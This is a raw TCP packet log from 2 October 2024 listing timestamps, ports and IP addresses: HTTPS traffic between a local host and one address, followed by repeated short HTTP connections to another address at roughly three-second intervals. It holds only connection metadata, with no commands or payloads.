                                        Oct 2, 2024 07:19:08.217432976 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.217499018 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.221450090 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.221513033 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.221518993 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.221570969 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.228091955 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.228146076 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.228152037 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.228202105 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.234137058 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.234191895 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.234198093 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.234255075 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.240113974 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.240169048 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.241503954 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.241560936 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.246210098 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.246268034 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.246273994 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.246330976 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.252196074 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.252249002 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.252254963 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.252305984 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.258493900 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.258555889 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.258563042 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.258614063 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.264164925 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.264220953 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.264226913 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.264276981 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.268939972 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.268997908 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.277910948 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.277970076 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.278209925 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.278265953 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.297332048 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.297415018 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.297749043 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.297945023 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.299407005 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.299465895 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.300602913 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.300653934 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.300661087 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.300705910 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.302861929 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.302911043 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.305542946 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.305597067 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.305603981 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.305660963 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.307991028 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.308043003 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.308047056 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.308058023 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.308104992 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.310028076 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.310081959 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.310719967 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.310779095 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.311512947 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.311568975 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.315736055 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.315797091 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.316327095 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.316380978 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.320691109 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.320749044 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.321111917 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.321190119 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.325478077 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.325531006 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.325862885 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.325917006 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.330316067 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.330374956 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.330722094 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.330770016 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.334819078 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.334877968 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.335227966 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.335278988 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.340058088 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.340107918 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.340255022 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.340312958 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.344193935 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.344255924 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.344671965 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.344726086 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.348948002 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.349004984 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.349348068 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.349402905 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.353152037 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.353204012 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.353573084 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.353630066 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.357310057 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.357377052 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.357633114 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.357688904 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.358560085 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.358633041 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.362194061 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.362293005 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.362299919 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.362355947 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.365731955 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.365804911 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.365812063 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.365866899 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.369630098 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.369700909 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.369707108 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.369762897 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.373357058 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.373429060 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.373435020 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.373490095 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.377356052 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.377465010 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.377501965 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:08.377536058 CEST44359083142.250.186.161192.168.2.4
                                        Oct 2, 2024 07:19:08.377604961 CEST59083443192.168.2.4142.250.186.161
                                        Oct 2, 2024 07:19:09.551563025 CEST5908480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:09.556750059 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:09.556849003 CEST5908480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:09.567332029 CEST5908480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:09.572233915 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:09.572345018 CEST5908480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:09.577183962 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.302341938 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.302764893 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.302778006 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.302851915 CEST5908480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:12.303118944 CEST5908480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:12.303812981 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.303823948 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.303879976 CEST5908480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:12.325809002 CEST8059084137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.387228966 CEST5908580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:12.433909893 CEST8059085137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.434138060 CEST5908580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:12.437366009 CEST5908580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:12.483550072 CEST8059085137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:12.483647108 CEST5908580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:12.496450901 CEST8059085137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:15.446930885 CEST8059085137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:15.447427988 CEST8059085137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:15.447438955 CEST8059085137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:15.447618008 CEST5908580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:15.447810888 CEST5908580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:15.448391914 CEST8059085137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:15.448401928 CEST8059085137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:15.448450089 CEST5908580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:15.450321913 CEST5908580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:15.518100023 CEST5908680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:15.523035049 CEST8059086137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:15.523130894 CEST5908680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:15.525146961 CEST5908680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:15.529902935 CEST8059086137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:15.529973984 CEST5908680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:15.534862995 CEST8059086137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.171447039 CEST8059086137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.171510935 CEST8059086137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.171516895 CEST8059086137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.171665907 CEST5908680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:18.171963930 CEST5908680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:18.173398018 CEST8059086137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.173448086 CEST5908680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:18.184542894 CEST8059086137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.306056976 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:18.327533960 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.327888966 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:18.329709053 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:18.355377913 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.355470896 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:18.605232000 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:18.653620958 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:18.653631926 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:21.012243986 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:21.012944937 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:21.012959957 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:21.013031960 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:21.013228893 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:21.013755083 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:21.013768911 CEST8059087137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:21.013813019 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:21.013848066 CEST5908780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:21.150321007 CEST5908880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:21.244424105 CEST8059088137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:21.244518042 CEST5908880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:21.246655941 CEST5908880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:21.251805067 CEST8059088137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:21.251872063 CEST5908880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:21.256763935 CEST8059088137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:23.973371029 CEST8059088137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:23.973893881 CEST8059088137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:23.973906040 CEST8059088137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:23.973963976 CEST5908880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:23.974154949 CEST5908880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:23.976268053 CEST8059088137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:23.976329088 CEST5908880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:23.983200073 CEST8059088137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:24.128253937 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:24.147471905 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:24.147589922 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:24.150774956 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:24.164666891 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:24.164841890 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:24.175031900 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.547966957 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.548192024 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.548202991 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.548269033 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.548573017 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.549601078 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.549609900 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.549618006 CEST8059089137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.549653053 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.549653053 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.549685001 CEST5908980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.680460930 CEST5909080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.695063114 CEST8059090137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.695344925 CEST5909080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.697428942 CEST5909080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.707297087 CEST8059090137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:27.707361937 CEST5909080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:27.714648962 CEST8059090137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:30.379097939 CEST8059090137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:30.379656076 CEST8059090137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:30.379667044 CEST8059090137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:30.379724979 CEST5909080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:30.379918098 CEST5909080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:30.380639076 CEST8059090137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:30.380682945 CEST5909080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:30.380791903 CEST8059090137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:30.380831957 CEST5909080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:30.537720919 CEST5909180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:30.543658018 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:30.543745041 CEST5909180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:30.545875072 CEST5909180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:30.551366091 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:30.551426888 CEST5909180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:30.556756973 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.224482059 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.224961042 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.224972010 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.225028992 CEST5909180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:33.225313902 CEST5909180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:33.226133108 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.226181030 CEST5909180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:33.230196953 CEST8059091137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.381107092 CEST5909280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:33.385958910 CEST8059092137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.386148930 CEST5909280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:33.388360977 CEST5909280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:33.393131971 CEST8059092137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:33.393218040 CEST5909280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:33.398072958 CEST8059092137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:36.056476116 CEST8059092137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:36.056906939 CEST8059092137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:36.056917906 CEST8059092137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:36.057069063 CEST5909280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:36.057190895 CEST5909280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:36.058104038 CEST8059092137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:36.058157921 CEST5909280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:36.061887980 CEST8059092137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:36.207479000 CEST5909380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:36.212784052 CEST8059093137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:36.212888002 CEST5909380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:36.215107918 CEST5909380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:36.220001936 CEST8059093137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:36.220072031 CEST5909380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:36.224920034 CEST8059093137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:38.827873945 CEST8059093137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:38.828331947 CEST8059093137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:38.828349113 CEST8059093137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:38.828485012 CEST5909380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:38.828600883 CEST5909380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:38.829339027 CEST8059093137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:38.829385996 CEST5909380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:38.833647013 CEST8059093137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:38.963371992 CEST5909480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:38.968198061 CEST8059094137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:38.968291998 CEST5909480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:38.970418930 CEST5909480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:38.975522041 CEST8059094137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:38.975579023 CEST5909480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:38.980396032 CEST8059094137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:41.575835943 CEST8059094137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:41.576193094 CEST8059094137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:41.576204062 CEST8059094137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:41.576277018 CEST5909480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:41.576428890 CEST5909480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:41.577500105 CEST8059094137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:41.577555895 CEST5909480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:41.581480026 CEST8059094137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:41.711570024 CEST5909580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:41.716464043 CEST8059095137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:41.716552019 CEST5909580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:41.718657017 CEST5909580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:41.723824024 CEST8059095137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:41.723886013 CEST5909580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:41.728671074 CEST8059095137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:44.443887949 CEST8059095137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:44.444272041 CEST8059095137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:44.444283009 CEST8059095137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:44.444483042 CEST5909580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:44.444698095 CEST5909580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:44.445385933 CEST8059095137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:44.445609093 CEST8059095137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:44.445655107 CEST5909580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:44.447083950 CEST5909580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:44.587529898 CEST5909680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:44.592694998 CEST8059096137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:44.596504927 CEST5909680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:44.598640919 CEST5909680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:44.603518963 CEST8059096137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:44.604525089 CEST5909680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:44.609427929 CEST8059096137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:47.324307919 CEST8059096137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:47.324704885 CEST8059096137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:47.324717045 CEST8059096137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:47.324760914 CEST5909680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:47.325901985 CEST8059096137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:47.325978994 CEST5909680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:47.326541901 CEST5909680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:47.331337929 CEST8059096137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:47.470846891 CEST5909780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:47.475802898 CEST8059097137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:47.476011038 CEST5909780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:47.479007959 CEST5909780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:47.483828068 CEST8059097137.184.191.215192.168.2.4
